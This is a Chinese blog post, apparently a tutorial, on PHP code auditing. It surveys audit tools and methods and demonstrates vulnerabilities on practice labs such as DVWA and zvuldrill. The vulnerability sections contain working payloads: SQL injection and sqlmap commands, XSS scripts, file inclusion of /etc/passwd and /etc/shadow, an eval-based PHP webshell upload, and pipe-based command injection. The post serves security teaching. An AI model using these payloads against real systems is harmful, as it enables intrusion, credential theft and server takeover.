<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">



  <meta name="google-site-verification" content="1gKDAfjMjYT38fOTFSyhEOLm7-FQlmNHxLM5SNpSFAc">














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="代码审计,">





  <link rel="alternate" href="/rss2.xml" title="Jaie" type="application/atom+xml">






<meta name="description" content="代码审计对编程语言的基础需要有一定的基础，基于PHP编程语言进行常见漏洞审计总结，利用靶场、CMS漏洞等相关例题实例对漏洞类型进行解述，并根据OWASP 2017 TOP10和阿里云2019上半年Web应用安全报告结合进行漏洞分类（如下两图）OWASP开放式Web应用程序安全项目是一个组织，它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。从OWASP和阿里云的报告可以看出在互联网">
<meta name="keywords" content="代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="代码审计基础">
<meta property="og:url" content="https://www.jaie.cc/2020/07/19/代码审计基础/index.html">
<meta property="og:site_name" content="Jaie">
<meta property="og:description" content="代码审计对编程语言的基础需要有一定的基础，基于PHP编程语言进行常见漏洞审计总结，利用靶场、CMS漏洞等相关例题实例对漏洞类型进行解述，并根据OWASP 2017 TOP10和阿里云2019上半年Web应用安全报告结合进行漏洞分类（如下两图）OWASP开放式Web应用程序安全项目是一个组织，它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。从OWASP和阿里云的报告可以看出在互联网">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/6cb4e3162ff3fe083e398f27902e5565.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/f4d0698c5d88cf30d708f7e88669ce4e.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/f5263f907940319bc75f3b1187cc7080.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/9265070d62fb722b7ca2d5bef469ae2f.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/12e814e22363e02151fd12a4c5ca41b0.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/7df495f07fb3e8877f6762c32baba59a.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/cebce3aee6402763c141606e18751b90.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/b55d83cb456ba44b4c8f15abc39e7b6b.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/d1bb146cd9c2e649cc6d245234c48ea8.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/f25752f5a4fed0c494ab0e4170f7fe61.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/d67849142425eb0e8f9cfa9ce2f2c997.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/36e097390ec9cf5de80806846dcd76be.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/d3d003224daba22eb815a4cc28b2dc0d.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/7a949a08d6dbb4bd55c5bc5455379c98.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/6f4fff94d29b2521be8d4a202ca8ffac.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/a82bce4c6441fb013ff8defac842a73a.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/c2e602e694c67ce55c553f22f2bbc634.png">
<meta property="og:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/d7cdba1412d551c0bd6b58dce400e46d.png">
<meta property="og:updated_time" content="2020-07-19T00:32:07.535Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="代码审计基础">
<meta name="twitter:description" content="代码审计对编程语言的基础需要有一定的基础，基于PHP编程语言进行常见漏洞审计总结，利用靶场、CMS漏洞等相关例题实例对漏洞类型进行解述，并根据OWASP 2017 TOP10和阿里云2019上半年Web应用安全报告结合进行漏洞分类（如下两图）OWASP开放式Web应用程序安全项目是一个组织，它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。从OWASP和阿里云的报告可以看出在互联网">
<meta name="twitter:image" content="https://www.jaie.cc/2020/07/19/代码审计基础/6cb4e3162ff3fe083e398f27902e5565.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://www.jaie.cc/2020/07/19/代码审计基础/">





  <title>代码审计基础 | Jaie</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Jaie</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-留言板">
          <a href="/guestbook" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-newspaper-o"></i> <br>
            
            留言板
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.jaie.cc/2020/07/19/代码审计基础/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Jaie">
      <meta itemprop="description" content>
      <meta itemprop="image" content="https://jaie-1256725437.cos.ap-guangzhou.myqcloud.com/pic/20190424201847.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Jaie">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">代码审计基础</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-07-19T08:22:00+08:00">
                2020-07-19
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透测试/" itemprop="url" rel="index">
                    <span itemprop="name">渗透测试</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  4.9k
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p> 代码审计对编程语言的基础需要有一定的基础，基于PHP编程语言进行常见漏洞审计总结，利用靶场、CMS漏洞等相关例题实例对漏洞类型进行解述，并根据OWASP 2017 TOP10和阿里云2019上半年Web应用安全报告结合进行漏洞分类（如下两图）<br>OWASP开放式Web应用程序安全项目是一个组织，它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。从OWASP和阿里云的报告可以看出在互联网中常见的WEB攻击，SQL注入、信息泄漏、XXE漏洞、文件包含、XSS跨站攻击等，可以从这些常见的漏洞入手进行审计。</p>
<p><img src="/2020/07/19/代码审计基础/6cb4e3162ff3fe083e398f27902e5565.png" alt></p>
<p><img src="/2020/07/19/代码审计基础/f4d0698c5d88cf30d708f7e88669ce4e.png" alt></p>
<h1 id="一-代码审计"><a href="#一-代码审计" class="headerlink" title="一.代码审计"></a>一.代码审计</h1><h2 id="1-审计工具选择"><a href="#1-审计工具选择" class="headerlink" title="1.审计工具选择"></a>1.审计工具选择</h2><ol>
<li>Seay源代码审计系统</li>
</ol>
<p>Seay是基于C#语言开发的一款针对PHP代码安全性审计的系统，主要运行与Windows系统上。这款软件能够发现SQL注入、代码执行、命令执行、文件包含、文件上传、绕过转义防护、拒绝服务、XSS跨站、信息泄漏、任意URL跳转等漏洞，基本覆盖常见的PHP漏洞。</p>
<ol start="2">
<li>RIPS</li>
</ol>
<p>PIPS是一款基于PHP开发的针对PHP代码审计的软件。同时它也是一款开源软件，由国外安全研究员Johannes<br>Dahse开发，程序大小只有450KB。RIPS通过标记和解析所有源代码文件，自动检测PHP应用程序中的漏洞。RIPS能够将PHP源代码转换为程序模型，检测程序流期间用户输入可能污染的敏感接收器，即潜在易受攻击的函数。RIPS能够发现SQL注入、XSS跨站、文件包含、代码执行、文件读取等等多种漏洞，支持多种样式的代码高亮，支持自动生成漏洞利用。</p>
<ol start="3">
<li>Sublime Text</li>
</ol>
<p>Sublime Text<br>是一个跨平台的编辑器，同时也是一个先进的代码编辑器。支持windows、linux和Mac系统，其在不同操作系统下有不同的操作的习惯，包括界面布局，快捷键等。Sublime Text是由程序员Jon Skinner于2008年1月份所开发出来，它最初被设计为一个具有丰富扩展功能的Vim。</p>
<p>Sublime<br>Text具有漂亮的用户界面和强大的功能，例如代码<a href="https://baike.sogou.com/lemma/ShowInnerLink.htm?lemmaId=4069827&amp;ss_c=ssc.citiao.link" target="_blank" rel="noopener">缩略图</a>，Python的插件，代码段等。还可自定义键绑定，菜单和工具栏。Sublime Text 的主要功能包括：拼写检查，书签，完整的 Python API ， Goto功能，即时项目切换，多选择，多窗口等等。</p>
<ol start="3">
<li>Burp Suite</li>
</ol>
<p>Burp Suite是一款基于Java语言开发的安全测试工具，使用它需要安装Java有运行环境。Burp Suite 是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。其强大的功能受到几乎所有安全人员的青睐。Burp Suite主要分为Proxy、Spider、Scanner、Intruder、Repeater、Decoder和Comparer几大模块。</p>
<ol start="4">
<li>Acunenetix Web Vulnarability Scanner</li>
</ol>
<p>Acunetix Web Vulnerability<br>Scanner（简称AWVS）是一款知名的Web网络漏洞扫描工具，它通过网络爬虫测试你的网站安全，检测流行安全漏洞,它包含有收费和免费两种版本。它包含有收费和免费两种版本。</p>
<h2 id="2-审计思路"><a href="#2-审计思路" class="headerlink" title="2.审计思路"></a>2.审计思路</h2><p>代码审计需要方法，如果直接拿起源代码看的话，将会寸步难行，很难能有明显的效果，特别是一个应用项目源代码上千上万行。所有代码审计就必须要熟悉代码审计的思路，只有了解这些思路之后，我们才知道如何下手，如何最高效地挖掘到最有质量的漏洞，常见的代码审计有通读全文法、敏感函数参数回溯法、定向功能分析法。</p>
<ol>
<li>通读全文法</li>
</ol>
<p>顾名思义，就是通过阅读所有的源代码，来发现代码存在的隐患。这种方法只适用代码量较少的项目，当项目代码极大时，很难兼顾所有的代码，而且代码都是很强的逻辑性的。利用这种思路阅读代码代码时，也不是一味的读代码，需要一定的技巧，需要理解代码的业务逻辑，项目程序的代码结构，如主目录有哪些文件，模块目录有哪些文件，插件目录有哪些文件，除此之外、也需要知道文件大小、创建时间、核心文件文件命名含义及实现的功能、需要对项目整体有着把握。如duenling1.0<br>程序主目录</p>
<p><img src="/2020/07/19/代码审计基础/f5263f907940319bc75f3b1187cc7080.png" alt></p>
<p>从目录和文件命名中，可以了解到程序大概框架，各个目录命名和文件内容，install目录时程序初始安装文件、editor目录下是编辑器文件、js目录是js文件、plug-in目录下是插件文件、style目录下是样式文件、images是放置图片的目录、index.php是页面初始页面。</p>
<ol>
<li>敏感函数参数回溯法</li>
</ol>
<p>大多数漏洞很大程度都是由函数使用不规范，或函数本身存在安全问题，这些导致漏洞产生的函数就是敏感函数。通过搜索这些敏感函数定向分析函数使用问题，是否存在漏洞。像SQL注入，有一些特征，比如select、insert等，再结合from和where等关键字分析判断是否存在SQL注入。</p>
<p>可以借助审计工具自动搜索敏感函数，来进行审计，这里用Seay源代码审计系统审计duenling1.0为例，Seay源代码审计系统审计得结果是根据敏感函数判断得，审计结果如下图。需要主要注意是这种自动审计工具大多时候是误报，且没有给出漏洞得利用方式，所以最终还是以人工审计为主，工具为辅。</p>
<p><img src="/2020/07/19/代码审计基础/9265070d62fb722b7ca2d5bef469ae2f.png" alt></p>
<ol>
<li>定向功能分析法</li>
</ol>
<p>该方法主要是根据程序的业务逻辑和业务功能进行审计的，首先大概浏览网站的页面，比如有上传功能，有浏览功能，可能猜测到这个程序有上传漏洞、XSS漏洞等，可以大概的推测它有哪些漏洞，然后再针对猜测的结果，进行定向分析。<br>常见的功能漏洞：程序初始安装漏洞、站点信息泄露、文件上传管理、登录认证、权限管理漏洞、数据库备份漏洞、验证码漏洞等。</p>
<h2 id="二-漏洞审计"><a href="#二-漏洞审计" class="headerlink" title="二.漏洞审计"></a>二.漏洞审计</h2><h4 id="1-SQL注入"><a href="#1-SQL注入" class="headerlink" title="1.  SQL注入"></a>1.  SQL注入</h4><p>SQL注入（SQLi）是一种注入攻击，它使执行恶意SQL语句成为可能。这些语句控制Web应用程序后面的数据库服务器。攻击者可以使用SQL Injection漏洞绕过应用程序安全措施。他们可以遍历网页或Web应用程序的身份验证和授权，并检索整个SQL数据库的内容。他们还可以使用SQL Injection添加，修改和删除数据库中的记录。SQL注入是最常见的Web黑客技术之一。OWASP组织（开放式Web应用程序安全性项目）在其<a href="https://www.acunetix.com/vulnerability-scanner/owasp-top-10-compliance/" target="_blank" rel="noopener">OWASP Top<br>10</a> 2017文档中列出了注入，这是对Web应用程序安全性的头号威胁。</p>
<p>在进行代码审计是找寻SQL注入漏洞的类型，可以尝试找寻数据库操作的一些关键字，比如mysql_connect、mysql_quer、mysql_fetech_row等，数据查询的关键词又update、insert、delect，在审计过程中找到这些关键字，即可定向挖掘SQL注入的漏洞。</p>
<ol>
<li>普通注入</li>
</ol>
<p>普通注入是SQL注入漏洞中最容易利用得类型，普通注入有int型和string型，string型注入时需要闭合单双引号，重新组合成新的SQL语句。下面利用DWVA漏洞靶场演示普通注入漏洞，测试代码如下：</p>
<p>“\$query = “SELECT first_name, last_name FROM users WHERE user_id =’\$id’;”;”是此次漏洞利用得切入点，通过闭合参数\$id的单引号，重新构造SQL语句，“1’or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #” group_concat函数合并选择参数输出成1个字段，#是mysql的注释符，用来注释后面的双引号，所以SQL执行的语句是“\$query  = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #   ‘;”;”从下图可以看出语句读取成功，读出了数据库的账号密码，造成非常大的危害，攻击者只需要拿到账号密码登录数据库或构造可以拖库SQL语句，便可拖下整个数据库的数据，在现实中便会造成非常大的危害。</p>
<p><img src="/2020/07/19/代码审计基础/12e814e22363e02151fd12a4c5ca41b0.png" alt></p>
<ol>
<li>SQL盲注</li>
</ol>
<p>SQL盲注是根据回显结果的SQL的注入，不同普通的SQL注入直接执行一句SQL语句得到想要的的结果，SQL盲注需要构造复杂的SQL语句，并且是多条的。根据页面的响应方式的不同，SQL盲注分为：基于布尔的盲注、基于时间的盲注、基于报错的盲注。</p>
<p>布尔盲注的回显是基于SQL执行语句真or假来判断；时间盲注是根据时间函数服务器返回的时间判断的；报错注入是根据回显结果SQL的报错内容判断的。</p>
<p>下面用DWVS SQL盲注演示下，测试代码如下：</p>
<p>从源代码看到这是布尔盲注，根据“ \$num = \@mysqli_num_rows( \$result);“从“\$getid = “SELECT first_name, last_name FROM users WHERE user_id =’\$id’;”;” 获取的结果行数判断id存在与否，返回结构为exists和MISSING。</p>
<p><img src="/2020/07/19/代码审计基础/7df495f07fb3e8877f6762c32baba59a.png" alt></p>
<p>在文本框执行语句“1’ and length(database())>5 #”返回MISSING、“1’ and<br>length(database())>4 #” 返回exists，“1’ and length(database())=4 #”返回exists，得出当前所连接数据库名称的长度=4，再然后就是利用substr()函数判断数据库名称的字符组成元素，文本框“1’<br>and ascii(substr(database(),1,1))=100 #” 这里100对应的ASCII码查询是字母 <strong>d，</strong>下来我们用sqlmap工具自动化直接跑出数据库，执行语句“sqlmap.py<br>-u “<a href="http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit\#&quot;" target="_blank" rel="noopener">http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit\#&quot;</a> –dbms mysql –  cookie=”security=low;PHPSESSID=m83iepdter52q5ugifpgvdogl4;” –dbs –level 3“</p>
<p>如下图所示，跑出来了。</p>
<p><img src="/2020/07/19/代码审计基础/cebce3aee6402763c141606e18751b90.png" alt></p>
<h4 id="2-XSS漏洞"><a href="#2-XSS漏洞" class="headerlink" title="2.  XSS漏洞"></a>2.  XSS漏洞</h4><p>跨站点脚本（XSS）是一种客户端代码注入攻击。攻击者旨在通过在合法网页或Web应用程序中包含恶意代码，在受害者的Web浏览器中执行恶意脚本。当受害者访问执行恶意代码的网页或Web应用程序时，就会发生实际的攻击。网页或Web应用程序成为将恶意脚本传递到用户浏览器的工具。经常用于跨站点脚本攻击的脆弱工具是论坛，留言板和允许评论的网页。如果网页或Web应用程序在生成的输出中使用未经过滤的用户输入，则容易受到XSS的攻击。然后必须由受害者的浏览器解析此用户输入。</p>
<p>挖掘XSS漏洞的关键在于寻找没有被过滤的参数，且这些参数传入到输出函数，我们只要寻找带有变量的这些函数即可。常用的输出函数列表如下：print、print_r、echo、printf、sprintf、die、var_dump、var_export，XSS漏洞经常出现在文章发表、评论回复、留言以及资料设置等地方，特别是在发文章的时候，因为这里大多都是富文本，有各种图片引用、文字格式设置等，所以经常出现对标签事件过滤不严格导致的XSS，同样，评论回复以及留言也是。XSS漏洞分为反射型XSS、储存型XSS、DOM型XSS。DOM型XSS比较不常见，这里我们反射型XSS、储存型XSS、DOM型XSS讲解。</p>
<ol>
<li>反射型XSS</li>
</ol>
<p>反射型XSS是把javascipt代码在前端执行，仅在浏览器客户端这边执行，不会威胁到服务端.这里用zvuldrill<br>Web漏洞演练平台项目代码进行演示，这是项目主目录下search.php的部分代码，可以看到用echo函数直接输出search参数，存在XSS漏洞，在网页页面找到这个功能点进行测试。用“\&lt;script>alert\&lt;/script>”语句进行测试，弹出弹框，测试成功。</p>
<p><img src="/2020/07/19/代码审计基础/b55d83cb456ba44b4c8f15abc39e7b6b.png" alt></p>
<p>、</p>
<p><img src="/2020/07/19/代码审计基础/d1bb146cd9c2e649cc6d245234c48ea8.png" alt></p>
<p><img src="/2020/07/19/代码审计基础/f25752f5a4fed0c494ab0e4170f7fe61.png" alt></p>
<ol>
<li>储存型XSS</li>
</ol>
<p>储型型XSS会对服务端造成危害，攻击者把js代码存进数据库，每次读取相应的数据内容都会反弹XSS，危害比反射型XSS大。可以看到虽然源代码进行了一定的过滤，trim（）函数移除字符串两侧的空白字符或其他预定义字符。mysql_real_escape_string（）函数会对特殊符号（\x00，\n，\r，\，‘，“，\x1a）进行转义。Stripslashes（）函数删除字符串中的反斜杠。很容易绕过，在message留言板中输入“\&lt;script>alert(/xss/)\&lt;/script>”，这条语句会写入数据库，每次刷新都会重新执行。</p>
<p><img src="/2020/07/19/代码审计基础/d67849142425eb0e8f9cfa9ce2f2c997.png" alt></p>
<h4 id="3-文件包含"><a href="#3-文件包含" class="headerlink" title="3.  文件包含"></a>3.  文件包含</h4><p>文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行，并得到网站配置或者敏感文件，进而获取到服务器权限，造成网站被恶意删除，用户和交易数据被篡改等一系列恶性后果。主要包括本地文件包含和远程文件包含两种形式，由于开发人员编写源码，开放着将可重复使用的代码插入到单个的文件中，并在需要的时候将它们包含在特殊的功能代码文件中，然后包含文件中的代码会被解释执行。由于并没有针对代码中存在文件包含的函数入口做过滤，导致客户端可以提交恶意构造语句提交，并交由服务器端解释执行。文件包含攻击中WEB服务器源码里可能存在inlcude()此类文件包含操作函数，可以通过客户端构造提交文件路径，是该漏洞攻击成功的最主要原因。</p>
<p>  和文件包含的相关函数有：include()、include_once()和require()、require_once()，我们可以从这些函数入手方便我们进行审计。</p>
<ol>
<li>本地文件包含</li>
</ol>
<p>本地文件包含（Local File Inclusion，LFI）是指只能打开并包含本地文件的漏洞，攻击者可以使用本地文件包含（LFI）来欺骗Web应用程序以在Web服务器上公开或运行件。LFI攻击可能导致信息泄露。</p>
<p>这里用zvuldrill Web漏洞演练平台项目代码进行演示，主目录下的about.php文件部分代码，代码如下：</p>
<p>include函数包含了\$f参数，\$f参数是用GET方式提交的，也就是说在URL里就可以进行想要的文件进行包含，如下面所示，包含D盘的1.txt成功显示，实际的利用中我们可以尝试包含其他文件，造成危害更大的泄漏，像linux系统的话可以包含/etc/passwd、/etc/shadow等文件。</p>
<p><img src="/2020/07/19/代码审计基础/36e097390ec9cf5de80806846dcd76be.png" alt></p>
<p><img src="/2020/07/19/代码审计基础/d3d003224daba22eb815a4cc28b2dc0d.png" alt></p>
<ol>
<li>远程文件包含</li>
</ol>
<p>远程文件包含（Remote File Inclusion，RFI）,使用远程文件包含（RFI），攻击者可以使Web应用程序包含远程文件。对于动态包含外部文件或脚本的Web应用程序，这是可能的。成功的RFI攻击对Web造成的潜在后果包括敏感信息泄露和跨站点脚本（XSS）到远程代码执行，以及最终导致整个系统受到损害。RFI的利用条件较为苛刻，需要php.ini中进行配置。</p>
<p>在php.ini中allow_url_fopen = On、allow_url_include =On，两个配置选项均需要为On，才能远程包含文件成功。测试代码如下：</p>
<p>文件命名1.php，利用GET方式提交file参数即在URL参数里面传入http：//remotehost/1.txt”,其中1.txt的内容为\&lt;?php phpinfo();>.访问后返回本机的phpinfo信息</p>
<p><img src="/2020/07/19/代码审计基础/7a949a08d6dbb4bd55c5bc5455379c98.png" alt></p>
<h4 id="4-文件上传"><a href="#4-文件上传" class="headerlink" title="4 .  文件上传"></a>4 .  文件上传</h4><p>文件上传漏洞，是指程序有文件上传功能，能上传代码执行的文件类型，进而通过让服务器的代码执行文件控制整个计算机的权限。这里上传的文件可以是木马，病毒，恶意脚本或者WebShell等。</p>
<p>文件上传的函数只有move_uploaded_file()这一个，所以在进行代码审计是搜索move_uploaded_file()快速定位可以上传的代码块，进行审计，这样会方便高效很多。这里用DWAV文件上传区块进行演示，测试代码如下：</p>
<p>可以看到上述代码用move_uploaded_file()进行文件上传且没有限制任何文件类型上传，并且在网页显示出hackable/uploads/目录，再结合URL便可以找到上传文件今天位置。首先创建一个test.php文件，内容为“\&lt;?php<br>\@eval(\$_POST[‘x’]);?>”，再进行上传，猜解上传文件上传指定的具体文件，转换为URL放进webshell连接工具中国菜刀，进行连接，连接成功，可以获取系统的终端和进行文件操作。</p>
<p><img src="/2020/07/19/代码审计基础/6f4fff94d29b2521be8d4a202ca8ffac.png" alt></p>
<p><img src="/2020/07/19/代码审计基础/a82bce4c6441fb013ff8defac842a73a.png" alt></p>
<p><img src="/2020/07/19/代码审计基础/c2e602e694c67ce55c553f22f2bbc634.png" alt></p>
<h4 id="5-命令执行"><a href="#5-命令执行" class="headerlink" title="5.  命令执行"></a>5.  命令执行</h4><p>命令执行即是在页面中可以执行操作系统终端的命令，像ipconfig、kill、rd、net<br>user等命令，等同把自己的计算机权限暴露在网络中，是非常的危险的漏洞。</p>
<p>在PHP中可以执行命令函数有system()、exec()、shell_exec()、passthru()、pcntl_exec()、popen()、proc_open()，一共七个函数，另外反引号（`）也可以执行命令但是反引号是调用shell_exec（）函数。只要找到这些函数就可以定向审计命令执行的漏洞。</p>
<p>从源代码看到使用了shell_exec 这个函数，\$target<br>request方式进来的数据没有进行截断和过滤，当输入“127.0.0.1 | dir<br>”相当执行了“ping 127.0.0.1 | dir”命令，这样我们可以执行我们想要执行任意命令。</p>
<p><img src="/2020/07/19/代码审计基础/d7cdba1412d551c0bd6b58dce400e46d.png" alt></p>
<h4 id="6-其他的一些漏洞"><a href="#6-其他的一些漏洞" class="headerlink" title="6.  其他的一些漏洞"></a>6.  其他的一些漏洞</h4><ol>
<li>信息泄漏</li>
</ol>
<p>信息泄漏漏洞主要是程序员在编辑程序时，没有将一些默认的文件和敏感的文件等删掉，比如数据库备份文件、配置文件等，.git目录，。SVN目录等攻击者利用该信息可以更容易得到网站权限，导致网站被黑。一些信息泄漏常见的命名：.hg、.zip、.bak、.txt、config等，这些信息泄漏危害可大可小，当泄漏的时网站源代码的话，黑客可以利用源代码进行审计方便黑客攻击网站。当泄漏的是数据库文件，造成就非常严重了。</p>
<ol start="2">
<li>重装漏洞</li>
</ol>
<p>在一些CMS网站程序中，网站在最开始会初始化安装，但因为程序设计缺陷会导致无限重装，对网站造成危害。举个例子，程序在安装完成后会将install.php<br>重命名为index.php.bak,但是由于Apache的解析漏洞：如果无法识别到最后一个后缀的话，就会向上解析，那么就又变成了php了，然后URL访问index.php.bak又成重装了。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"><i class="fa fa-tag"></i> 代码审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/07/19/linux连接罗技K380蓝牙问题解决方案/" rel="next" title="linux连接罗技k380蓝牙键盘问题解决方案">
                <i class="fa fa-chevron-left"></i> linux连接罗技k380蓝牙键盘问题解决方案
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC80MzA1OC8xOTYwNA=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
